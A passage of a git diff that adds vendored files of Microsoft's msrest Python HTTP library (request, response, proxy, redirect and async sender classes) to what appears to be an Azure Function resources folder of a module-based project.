save(self, filepath): + # type: (str) -> None + """Save current configuration to file. + + :param str filepath: Path to file where settings will be saved. + :raises: ValueError if supplied filepath cannot be written to. + """ + sections = [ + "Connection", + "Proxies", + "RedirectPolicy"] + for section in sections: + self._config.add_section(section) + + self._config.set("Connection", "timeout", self.connection.timeout) + self._config.set("Connection", "verify", self.connection.verify) + self._config.set("Connection", "cert", self.connection.cert) + + self._config.set("Proxies", "proxies", self.proxies.proxies) + self._config.set("Proxies", "env_settings", + self.proxies.use_env_settings) + + self._config.set("RedirectPolicy", "allow", self.redirect_policy.allow) + self._config.set("RedirectPolicy", "max_redirects", + self.redirect_policy.max_redirects) + + try: + with open(filepath, 'w') as configfile: + self._config.write(configfile) + except (KeyError, EnvironmentError): + error = "Supplied config filepath invalid." + raise_with_traceback(ValueError, error) + finally: + self._clear_config() + + def load(self, filepath): + # type: (str) -> None + """Load configuration from existing file. + + :param str filepath: Path to existing config file. + :raises: ValueError if supplied config file is invalid. + """ + try: + self._config.read(filepath) + import ast + self.connection.timeout = \ + self._config.getint("Connection", "timeout") + self.connection.verify = \ + self._config.getboolean("Connection", "verify") + self.connection.cert = \ + self._config.get("Connection", "cert") + + self.proxies.proxies = \ + ast.literal_eval(self._config.get("Proxies", "proxies")) + self.proxies.use_env_settings = \ + self._config.getboolean("Proxies", "env_settings") + + self.redirect_policy.allow = \ + self._config.getboolean("RedirectPolicy", "allow") + self.redirect_policy.max_redirects = \ + self._config.getint("RedirectPolicy", "max_redirects") + + except (ValueError, EnvironmentError, NoOptionError): + error = "Supplied config file incompatible." + raise_with_traceback(ValueError, error) + finally: + self._clear_config() + + +class ClientRequest(object): + """Represents a HTTP request. + + URL can be given without query parameters, to be added later using "format_parameters". + + Instance can be created without data, to be added later using "add_content" + + Instance can be created without files, to be added later using "add_formdata" + + :param str method: HTTP method (GET, HEAD, etc.) + :param str url: At least complete scheme/host/path + :param dict[str,str] headers: HTTP headers + :param files: Files list. + :param data: Body to be sent. + :type data: bytes or str. + """ + def __init__(self, method, url, headers=None, files=None, data=None): + # type: (str, str, Mapping[str, str], Any, Any) -> None + self.method = method + self.url = url + self.headers = CaseInsensitiveDict(headers) + self.files = files + self.data = data + + def __repr__(self): + return '' % (self.method) + + @property + def body(self): + """Alias to data.""" + return self.data + + @body.setter + def body(self, value): + self.data = value + + def format_parameters(self, params): + # type: (Dict[str, str]) -> None + """Format parameters into a valid query string. + It's assumed all parameters have already been quoted as + valid URL strings. + + :param dict params: A dictionary of parameters. + """ + query = urlparse(self.url).query + if query: + self.url = self.url.partition('?')[0] + existing_params = { + p[0]: p[-1] + for p in [p.partition('=') for p in query.split('&')] + } + params.update(existing_params) + query_params = ["{}={}".format(k, v) for k, v in params.items()] + query = '?' + '&'.join(query_params) + self.url = self.url + query + + def add_content(self, data): + # type: (Optional[Union[Dict[str, Any], ET.Element]]) -> None + """Add a body to the request. + + :param data: Request body data, can be a json serializable + object (e.g. dictionary) or a generator (e.g. file data). + """ + if data is None: + return + + if isinstance(data, ET.Element): + bytes_data = ET.tostring(data, encoding="utf8") + self.headers['Content-Length'] = str(len(bytes_data)) + self.data = bytes_data + return + + # By default, assume JSON + try: + self.data = json.dumps(data) + self.headers['Content-Length'] = str(len(self.data)) + except TypeError: + self.data = data + + @staticmethod + def _format_data(data): + # type: (Union[str, IO]) -> Union[Tuple[None, str], Tuple[Optional[str], IO, str]] + """Format field data according to whether it is a stream or + a string for a form-data request. + + :param data: The request field data. + :type data: str or file-like object. + """ + if hasattr(data, 'read'): + data = cast(IO, data) + data_name = None + try: + if data.name[0] != '<' and data.name[-1] != '>': + data_name = os.path.basename(data.name) + except (AttributeError, TypeError): + pass + return (data_name, data, "application/octet-stream") + return (None, cast(str, data)) + + def add_formdata(self, content=None): + # type: (Optional[Dict[str, str]]) -> None + """Add data as a multipart form-data request to the request. + + We only deal with file-like objects or strings at this point. + The requests is not yet streamed. + + :param dict headers: Any headers to add to the request. + :param dict content: Dictionary of the fields of the formdata. + """ + if content is None: + content = {} + content_type = self.headers.pop('Content-Type', None) if self.headers else None + + if content_type and content_type.lower() == 'application/x-www-form-urlencoded': + # Do NOT use "add_content" that assumes input is JSON + self.data = {f: d for f, d in content.items() if d is not None} + else: # Assume "multipart/form-data" + self.files = {f: self._format_data(d) for f, d in content.items() if d is not None} + +class HTTPClientResponse(object): + """Represent a HTTP response. + + No body is defined here on purpose, since async pipeline + will provide async ways to access the body + + You have two different types of body: + - Full in-memory using "body" as bytes + """ + def __init__(self, request, internal_response): + # type: (ClientRequest, Any) -> None + self.request = request + self.internal_response = internal_response + self.status_code = None # type: Optional[int] + self.headers = {} # type: MutableMapping[str, str] + self.reason = None # type: Optional[str] + + def body(self): + # type: () -> bytes + """Return the whole body as bytes in memory. + """ + pass + + def text(self, encoding=None): + # type: (str) -> str + """Return the whole body as a string. + + :param str encoding: The encoding to apply. If None, use "utf-8-sig". + Implementation can be smarter if they want (using headers). + """ + return self.body().decode(encoding or "utf-8-sig") + + def raise_for_status(self): + """Raise for status. Should be overridden, but basic implementation provided. + """ + if self.status_code >= 400: + raise ClientRequestError("Received status code {}".format(self.status_code)) + + +class ClientResponse(HTTPClientResponse): + + def stream_download(self, chunk_size=None, callback=None): + # type: (Optional[int], Optional[Callable]) -> Iterator[bytes] + """Generator for streaming request body data. + + Should be implemented by sub-classes if streaming download + is supported. + + :param callback: Custom callback for monitoring progress. + :param int chunk_size: + """ + pass + + +class ClientRedirectPolicy(object): + """Redirect configuration settings. + """ + + def __init__(self): + self.allow = True + self.max_redirects = 30 + + def __bool__(self): + # type: () -> bool + """Whether redirects are allowed.""" + return self.allow + + def __call__(self): + # type: () -> int + """Return configuration to be applied to connection.""" + debug = "Configuring redirects: allow=%r, max=%r" + _LOGGER.debug(debug, self.allow, self.max_redirects) + return self.max_redirects + + +class ClientProxies(object): + """Proxy configuration settings. + Proxies can also be configured using HTTP_PROXY and HTTPS_PROXY + environment variables, in which case set use_env_settings to True. + """ + + def __init__(self): + self.proxies = {} + self.use_env_settings = True + + def __call__(self): + # type: () -> Dict[str, str] + """Return configuration to be applied to connection.""" + proxy_string = "\n".join( + [" {}: {}".format(k, v) for k, v in self.proxies.items()]) + + _LOGGER.debug("Configuring proxies: %r", proxy_string) + debug = "Evaluate proxies against ENV settings: %r" + _LOGGER.debug(debug, self.use_env_settings) + return self.proxies + + def add(self, protocol, proxy_url): + # type: (str, str) -> None + """Add proxy. + + :param str protocol: Protocol for which proxy is to be applied. Can + be 'http', 'https', etc. Can also include host. + :param str proxy_url: The proxy URL. Where basic auth is required, + use the format: http://user:password@host + """ + self.proxies[protocol] = proxy_url + + +class ClientConnection(object): + """Request connection configuration settings. + """ + + def __init__(self): + self.timeout = 100 + self.verify = True + self.cert = None + self.data_block_size = 4096 + + def __call__(self): + # type: () -> Dict[str, Union[str, int]] + """Return configuration to be applied to connection.""" + debug = "Configuring request: timeout=%r, verify=%r, cert=%r" + _LOGGER.debug(debug, self.timeout, self.verify, self.cert) + return {'timeout': self.timeout, + 'verify': self.verify, + 'cert': self.cert} + + +__all__ = [ + 'ClientRequest', + 'ClientResponse', + 'HTTPSender', + # Generic HTTP configuration + 'HTTPSenderConfiguration', + 'ClientRedirectPolicy', + 'ClientProxies', + 'ClientConnection' +] + +try: + from .async_abc import AsyncHTTPSender, AsyncClientResponse # pylint: disable=unused-import + from .async_abc import __all__ as _async_all + __all__ += _async_all +except SyntaxError: # Python 2 + pass +except ImportError: # pyinstaller won't include Py3 files in Py2.7 mode + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..c3c217e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/aiohttp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/aiohttp.cpython-39.pyc new file mode 100644 index 0000000..e3b5985 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/aiohttp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_abc.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_abc.cpython-39.pyc new file mode 100644 index 0000000..b6ec94d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_abc.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_requests.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_requests.cpython-39.pyc new file mode 100644 index 0000000..0093ddf Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/async_requests.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/requests.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/requests.cpython-39.pyc new file mode 100644 index 0000000..5617016 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__pycache__/requests.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/aiohttp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/aiohttp.py new file mode 100644 index 0000000..7ec55bf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/aiohttp.py @@ -0,0 +1,101 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from typing import Any, Callable, AsyncIterator, Optional + +import aiohttp +from multidict import CIMultiDict + +from . import AsyncHTTPSender, ClientRequest, AsyncClientResponse + +# Matching requests, because why not? +CONTENT_CHUNK_SIZE = 10 * 1024 + + +class AioHTTPSender(AsyncHTTPSender): + """AioHttp HTTP sender implementation. + """ + + def __init__(self, *, loop=None): + self._session = aiohttp.ClientSession(loop=loop) + + async def __aenter__(self): + await self._session.__aenter__() + return self + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + await self._session.__aexit__(*exc_details) + + async def send(self, request: ClientRequest, **config: Any) -> AsyncClientResponse: + """Send the request using this HTTP sender. + + Will pre-load the body into memory to be available with a sync method. + pass stream=True to avoid this behavior. + """ + result = await self._session.request( + request.method, + request.url, + **config + ) + response = AioHttpClientResponse(request, result) + if not config.get("stream", False): + await response.load_body() + return response + + +class AioHttpClientResponse(AsyncClientResponse): + def __init__(self, request: ClientRequest, aiohttp_response: aiohttp.ClientResponse) -> None: + super(AioHttpClientResponse, self).__init__(request, aiohttp_response) + # https://aiohttp.readthedocs.io/en/stable/client_reference.html#aiohttp.ClientResponse + self.status_code = aiohttp_response.status + self.headers = CIMultiDict(aiohttp_response.headers) + self.reason = aiohttp_response.reason + self._body = None + + def body(self) -> bytes: + """Return the whole body as bytes in memory. + """ + if not self._body: + raise ValueError("Body is not available. Call async method load_body, or do your call with stream=False.") + return self._body + + async def load_body(self) -> None: + """Load in memory the body, so it could be accessible from sync methods.""" + self._body = await self.internal_response.read() + + def raise_for_status(self): + self.internal_response.raise_for_status() + + def stream_download(self, chunk_size: Optional[int] = None, callback: Optional[Callable] = None) -> AsyncIterator[bytes]: + """Generator for streaming request body data. + """ + chunk_size = chunk_size or CONTENT_CHUNK_SIZE + async def async_gen(resp): + while True: + chunk = await resp.content.read(chunk_size) + if not chunk: + break + callback(chunk, resp) + return async_gen(self.internal_response) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_abc.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_abc.py new file mode 100644 index 0000000..93c33e9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_abc.py @@ -0,0 +1,90 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import abc + +from typing import Any, List, Union, Callable, AsyncIterator, Optional + +try: + from contextlib import AbstractAsyncContextManager # type: ignore +except ImportError: # Python <= 3.7 + class AbstractAsyncContextManager(object): # type: ignore + async def __aenter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + async def __aexit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + +from . import ClientRequest, HTTPClientResponse + + +class AsyncClientResponse(HTTPClientResponse): + + def stream_download(self, chunk_size: Optional[int] = None, callback: Optional[Callable] = None) -> AsyncIterator[bytes]: + """Generator for streaming request body data. + + Should be implemented by sub-classes if streaming download + is supported. + + :param callback: Custom callback for monitoring progress. + :param int chunk_size: + """ + pass + + +class AsyncHTTPSender(AbstractAsyncContextManager, abc.ABC): + """An http sender ABC. + """ + + @abc.abstractmethod + async def send(self, request: ClientRequest, **config: Any) -> AsyncClientResponse: + """Send the request using this HTTP sender. + """ + pass + + def build_context(self) -> Any: + """Allow the sender to build a context that will be passed + across the pipeline with the request. + + Return type has no constraints. Implementation is not + required and None by default. + """ + return None + + def __enter__(self): + raise TypeError("Use 'async with' instead") + + def __exit__(self, exc_type, exc_val, exc_tb): + # __exit__ should exist in pair with __enter__ but never executed + pass # pragma: no cover + + +__all__ = [ + 'AsyncHTTPSender', + 'AsyncClientResponse' +] \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_requests.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_requests.py new file mode 100644 index 0000000..f02b276 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/async_requests.py @@ -0,0 +1,240 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import asyncio +from collections.abc import AsyncIterator +import functools +import logging +from typing import Any, Callable, Optional, AsyncIterator as AsyncIteratorType + +from oauthlib import oauth2 +import requests +from requests.models import CONTENT_CHUNK_SIZE + +from ..exceptions import ( + TokenExpiredError, + ClientRequestError, + raise_with_traceback) +from . import AsyncHTTPSender, ClientRequest, AsyncClientResponse +from .requests import ( + BasicRequestsHTTPSender, + RequestsHTTPSender, + HTTPRequestsClientResponse +) + + +_LOGGER = logging.getLogger(__name__) + + +class AsyncBasicRequestsHTTPSender(BasicRequestsHTTPSender, AsyncHTTPSender): # type: ignore + + async def __aenter__(self): + return super(AsyncBasicRequestsHTTPSender, self).__enter__() + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + return super(AsyncBasicRequestsHTTPSender, self).__exit__() + + async def send(self, request: ClientRequest, **kwargs: Any) -> AsyncClientResponse: # type: ignore + """Send the request using this HTTP sender. + """ + # It's not recommended to provide its own session, and is mostly + # to enable some legacy code to plug correctly + session = kwargs.pop('session', self.session) + + loop = kwargs.get("loop", asyncio.get_event_loop()) + future = loop.run_in_executor( + None, + functools.partial( + session.request, + request.method, + request.url, + **kwargs + ) + ) + try: + return AsyncRequestsClientResponse( + request, + await future + ) + except requests.RequestException as err: + msg = "Error occurred in request." + raise_with_traceback(ClientRequestError, msg, err) + +class AsyncRequestsHTTPSender(AsyncBasicRequestsHTTPSender, RequestsHTTPSender): # type: ignore + + async def send(self, request: ClientRequest, **kwargs: Any) -> AsyncClientResponse: # type: ignore + """Send the request using this HTTP sender. + """ + requests_kwargs = self._configure_send(request, **kwargs) + return await super(AsyncRequestsHTTPSender, self).send(request, **requests_kwargs) + + +class _MsrestStopIteration(Exception): + pass + +def _msrest_next(iterator): + """"To avoid: + TypeError: StopIteration interacts badly with generators and cannot be raised into a Future + """ + try: + return next(iterator) + except StopIteration: + raise _MsrestStopIteration() + +class StreamDownloadGenerator(AsyncIterator): + + def __init__(self, response: requests.Response, user_callback: Optional[Callable] = None, block: Optional[int] = None) -> None: + self.response = response + self.block = block or CONTENT_CHUNK_SIZE + self.user_callback = user_callback + self.iter_content_func = self.response.iter_content(self.block) + + async def __anext__(self): + loop = asyncio.get_event_loop() + try: + chunk = await loop.run_in_executor( + None, + _msrest_next, + self.iter_content_func, + ) + if not chunk: + raise _MsrestStopIteration() + if self.user_callback and callable(self.user_callback): + self.user_callback(chunk, self.response) + return chunk + except _MsrestStopIteration: + self.response.close() + raise StopAsyncIteration() + except Exception as err: + _LOGGER.warning("Unable to stream download: %s", err) + self.response.close() + raise + +class AsyncRequestsClientResponse(AsyncClientResponse, HTTPRequestsClientResponse): + + def stream_download(self, chunk_size: Optional[int] = None, callback: Optional[Callable] = None) -> AsyncIteratorType[bytes]: + """Generator for streaming request body data. + + :param callback: Custom callback for monitoring progress. + :param int chunk_size: + """ + return StreamDownloadGenerator( + self.internal_response, + callback, + chunk_size + ) + + +# Trio support +try: + import trio + + class TrioStreamDownloadGenerator(AsyncIterator): + + def __init__(self, response: requests.Response, user_callback: Optional[Callable] = None, block: Optional[int] = None) -> None: + self.response = response + self.block = block or CONTENT_CHUNK_SIZE + self.user_callback = user_callback + self.iter_content_func = self.response.iter_content(self.block) + + async def __anext__(self): + try: + chunk = await trio.to_thread.run_sync( + _msrest_next, + self.iter_content_func, + ) + if not chunk: + raise _MsrestStopIteration() + if self.user_callback and callable(self.user_callback): + self.user_callback(chunk, self.response) + return chunk + except _MsrestStopIteration: + self.response.close() + raise StopAsyncIteration() + except Exception as err: + _LOGGER.warning("Unable to stream download: %s", err) + self.response.close() + raise + + class TrioAsyncRequestsClientResponse(AsyncClientResponse, HTTPRequestsClientResponse): + + def stream_download(self, chunk_size: Optional[int] = None, callback: Optional[Callable] = None) -> AsyncIteratorType[bytes]: + """Generator for streaming request body data. + + :param callback: Custom callback for monitoring progress. + :param int chunk_size: + """ + return TrioStreamDownloadGenerator( + self.internal_response, + callback, + chunk_size + ) + + + class AsyncTrioBasicRequestsHTTPSender(BasicRequestsHTTPSender, AsyncHTTPSender): # type: ignore + + async def __aenter__(self): + return super(AsyncTrioBasicRequestsHTTPSender, self).__enter__() + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + return super(AsyncTrioBasicRequestsHTTPSender, self).__exit__() + + async def send(self, request: ClientRequest, **kwargs: Any) -> AsyncClientResponse: # type: ignore + """Send the request using this HTTP sender. + """ + # It's not recommended to provide its own session, and is mostly + # to enable some legacy code to plug correctly + session = kwargs.pop('session', self.session) + + trio_limiter = kwargs.get("trio_limiter", None) + future = trio.to_thread.run_sync( + functools.partial( + session.request, + request.method, + request.url, + **kwargs + ), + limiter=trio_limiter + ) + try: + return TrioAsyncRequestsClientResponse( + request, + await future + ) + except requests.RequestException as err: + msg = "Error occurred in request." + raise_with_traceback(ClientRequestError, msg, err) + + class AsyncTrioRequestsHTTPSender(AsyncTrioBasicRequestsHTTPSender, RequestsHTTPSender): # type: ignore + + async def send(self, request: ClientRequest, **kwargs: Any) -> AsyncClientResponse: # type: ignore + """Send the request using this HTTP sender. + """ + requests_kwargs = self._configure_send(request, **kwargs) + return await super(AsyncTrioRequestsHTTPSender, self).send(request, **requests_kwargs) + +except ImportError: + # trio not installed + pass \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/requests.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/requests.py new file mode 100644 index 0000000..9652528 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/requests.py @@ -0,0 +1,464 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import contextlib +import logging +import threading +from typing import TYPE_CHECKING, List, Callable, Iterator, Any, Union, Dict, Optional # pylint: disable=unused-import +import warnings + +try: + from configparser import NoOptionError +except ImportError: + from ConfigParser import NoOptionError # type: ignore + +from oauthlib import oauth2 +import requests +from requests.models import CONTENT_CHUNK_SIZE + +from urllib3 import Retry # Needs requests 2.16 at least to be safe + +from ..exceptions import ( + TokenExpiredError, + ClientRequestError, + raise_with_traceback) +from . import HTTPSender, HTTPClientResponse, ClientResponse, HTTPSenderConfiguration + +if TYPE_CHECKING: + from . import ClientRequest # pylint: disable=unused-import + + +_LOGGER = logging.getLogger(__name__) + + + +class HTTPRequestsClientResponse(HTTPClientResponse): + def __init__(self, request, requests_response): + super(HTTPRequestsClientResponse, self).__init__(request, requests_response) + self.status_code = requests_response.status_code + self.headers = requests_response.headers + self.reason = requests_response.reason + + def body(self): + return self.internal_response.content + + def text(self, encoding=None): + if encoding: + self.internal_response.encoding = encoding + return self.internal_response.text + + def raise_for_status(self): + self.internal_response.raise_for_status() + +class RequestsClientResponse(HTTPRequestsClientResponse, ClientResponse): + + def stream_download(self, chunk_size=None, callback=None): + # type: (Optional[int], Optional[Callable]) -> Iterator[bytes] + """Generator for streaming request body data. + + :param callback: Custom callback for monitoring progress. + :param int chunk_size: + """ + chunk_size = chunk_size or CONTENT_CHUNK_SIZE + with contextlib.closing(self.internal_response) as response: + # https://github.com/PyCQA/pylint/issues/1437 + for chunk in response.iter_content(chunk_size): # pylint: disable=no-member + if not chunk: + break + if callback and callable(callback): + callback(chunk, response=response) + yield chunk + + +class BasicRequestsHTTPSender(HTTPSender): + """Implements a basic requests HTTP sender. + + Since requests team recommends to use one session per requests, you should + not consider this class as thread-safe, since it will use one Session + per instance. + + In this simple implementation: + - You provide the configured session if you want to, or a basic session is created. + - All kwargs received by "send" are sent to session.request directly + """ + + def __init__(self, session=None): + # type: (Optional[requests.Session]) -> None + self.session = session or requests.Session() + + def __enter__(self): + # type: () -> BasicRequestsHTTPSender + return self + + def __exit__(self, *exc_details): # pylint: disable=arguments-differ + self.close() + + def close(self): + self.session.close() + + def send(self, request, **kwargs): + # type: (ClientRequest, Any) -> ClientResponse + """Send request object according to configuration. + + Allowed kwargs are: + - session : will override the driver session and use yours. Should NOT be done unless really required. + - anything else is sent straight to requests. + + :param ClientRequest request: The request object to be sent. + """ + # It's not recommended to provide its own session, and is mostly + # to enable some legacy code to plug correctly + session = kwargs.pop('session', self.session) + try: + response = session.request( + request.method, + request.url, + **kwargs) + except requests.RequestException as err: + msg = "Error occurred in request." + raise_with_traceback(ClientRequestError, msg, err) + + return RequestsClientResponse(request, response) + + +def _patch_redirect(session): + # type: (requests.Session) -> None + """Whether redirect policy should be applied based on status code. + + HTTP spec says that on 301/302 not HEAD/GET, should NOT redirect. + But requests does, to follow browser more than spec + https://github.com/requests/requests/blob/f6e13ccfc4b50dc458ee374e5dba347205b9a2da/requests/sessions.py#L305-L314 + + This patches "requests" to be more HTTP compliant. + + Note that this is super dangerous, since technically this is not public API. + """ + def enforce_http_spec(resp, request): + if resp.status_code in (301, 302) and \ + request.method not in ['GET', 'HEAD']: + return False + return True + + redirect_logic = session.resolve_redirects + + def wrapped_redirect(resp, req, **kwargs): + attempt = enforce_http_spec(resp, req) + return redirect_logic(resp, req, **kwargs) if attempt else [] + wrapped_redirect.is_msrest_patched = True # type: ignore + + session.resolve_redirects = wrapped_redirect # type: ignore + +class RequestsHTTPSender(BasicRequestsHTTPSender): + """A requests HTTP sender that can consume a msrest.Configuration object. + + This instance will consume the following configuration attributes: + - connection + - proxies + - retry_policy + - redirect_policy + - enable_http_logger + - hooks + - session_configuration_callback + """ + + _protocols = ['http://', 'https://'] + + # Set of authorized kwargs at the operation level + _REQUESTS_KWARGS = [ + 'cookies', + 'verify', + 'timeout', + 'allow_redirects', + 'proxies', + 'verify', + 'cert' + ] + + def __init__(self, config=None): + # type: (Optional[RequestHTTPSenderConfiguration]) -> None + self._session_mapping = threading.local() + self.config = config or RequestHTTPSenderConfiguration() + super(RequestsHTTPSender, self).__init__() + + @property # type: ignore + def session(self): + try: + return self._session_mapping.session + except AttributeError: + self._session_mapping.session = requests.Session() + self._init_session(self._session_mapping.session) + return self._session_mapping.session + + @session.setter + def session(self, value): + self._init_session(value) + self._session_mapping.session = value + + def _init_session(self, session): + # type: (requests.Session) -> None + """Init session level configuration of requests. + + This is initialization I want to do once only on a session. + """ + _patch_redirect(session) + + # Change max_retries in current all installed adapters + max_retries = self.config.retry_policy() + for protocol in self._protocols: + session.adapters[protocol].max_retries = max_retries + + def _configure_send(self, request, **kwargs): + # type: (ClientRequest, Any) -> Dict[str, str] + """Configure the kwargs to use with requests. + + See "send" for kwargs details. + + :param ClientRequest request: The request object to be sent. + :returns: The requests.Session.request kwargs + :rtype: dict[str,str] + """ + requests_kwargs = {} # type: Any + session = kwargs.pop('session', self.session) + + # If custom session was not create here + if session is not self.session: + self._init_session(session) + + session.max_redirects = int(self.config.redirect_policy()) + session.trust_env = bool(self.config.proxies.use_env_settings) + + # Initialize requests_kwargs with "config" value + requests_kwargs.update(self.config.connection()) + requests_kwargs['allow_redirects'] = 